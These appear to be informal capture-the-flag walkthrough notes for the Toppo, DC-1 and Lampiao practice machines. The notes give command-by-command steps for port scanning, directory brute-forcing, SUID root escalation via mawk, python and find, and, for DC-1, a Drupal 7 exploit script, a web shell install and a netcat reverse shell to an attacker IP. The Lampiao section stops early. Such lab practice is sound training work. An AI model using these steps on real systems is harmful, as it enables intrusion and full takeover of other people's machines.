===================================================================================
TOPPO

nmap [targetIP] -v -Pn -p-
  port 80
  port 23

open web browser -> plug in IPaddress -> inspect source code

DIRB to look for hidden files -> type in "dirb http://[targetIP]
  look for /admin, notes.txt, /robot.txt, 

Try to ssh -> ssh username@targetIP > hit enter > type password 

once in look for known exploit > uname -a > to see kernel version > use searchploit > 
type "searchploit OS X.X.X-X" > wait for result and exploit accordingly

look for binaries SUID, GUID > use the SUID > look for mawk, python
# Find SUID 
  find / -perm -u=s -type f 2>/dev/null 
# Find GUID 
  find / -perm -g=s -type f 2>/dev/null

-----------------------------------------------------------------------------------------------
use mawk > mawk 'BEGIN {system("/bin/sh")}' > if you see that pound '#' sign, you are now root

navigate throught it > ls > cd /root > ls > keep using ls and cd till you find the juice

open all txt files that you find > cat file.txt
------------------------------------------------------------------------------------------------
use python whatever version found, we'll use 2 > python2 -c 'import pty;pty.spawn("/bin/sh")' > 
if you see the #, you are now root
------------------------------------------------------------------------------------------------

===================================================================================
DC-1:

# Find the target
netdiscover -i eth0

# Nmap to see them open ports
nmap [targetIP] -v -Pn -p-

# look for port 22, 80
if theres 80, open it up in browser

# Look for the web technologies running in the target
whatweb [targetIP]

# don't forget to check the robot.txt
#go to browser and type in url "
[targetIP]/robot.txt

# look for useful info

# look for vulnerabilities using searchploit, the video shows the technology "drupal 7"
searchploit drupal 7 > result shows the exploit title and path 

# Launch the python script showed in searchploit to create user name and password
python /usr/share/exploitdb/exploits/php/webapps/34992.py -u syberoffense -p Password123! -t http://[targetIP]

# NOW, you can SSH or login via browser to target with your new account and try escalating your access
# Before logging in
open browser > go to drupal.org/project/shell > scroll down to find the applied file > right click the zip file under 7.x > and hit copy link location

# Now you can login and install the shell
log in to web site using the created the account > navigate to "Modules" tab > paste in the install from a URL > click install

# Enable the shell
scroll down to the bottom > under "other' enable shell > scroll down some more to save configuration

# Go the shell
go back to "Dashboard" > in search box type "navigation" then click search > click link for shell

# Establish reverse shell
back to terminal > establish netcat listener "nc -lvp 4444" > back to browser type > nc -nv [attackerIP] 4444 -e /bin/bash > back to terminal

# Use python script to establish shell then find any binaries with SUID
in terminal type > python -c 'import pty; pty.spawn("/bin/bash")' > you'll get into $ > now for finding bins type > find /-perm /4000 > result shows bins with SUID permission

# Use find command since it has SUID, should get you that juicy root access
find . -exec '/bin/sh' \; > use ls and cd till you find that flag.txt

===================================================================================
Lampiao

netdiscover -i eth0 > shows the targetIP

nmap targetIP -p- -sV > shows open ports; 22, 80, 1898 Apache

open browser > in URL type> targetIP:1898

dirb http://targetIP:port/ > shows them good stuff














































===================================================================================












































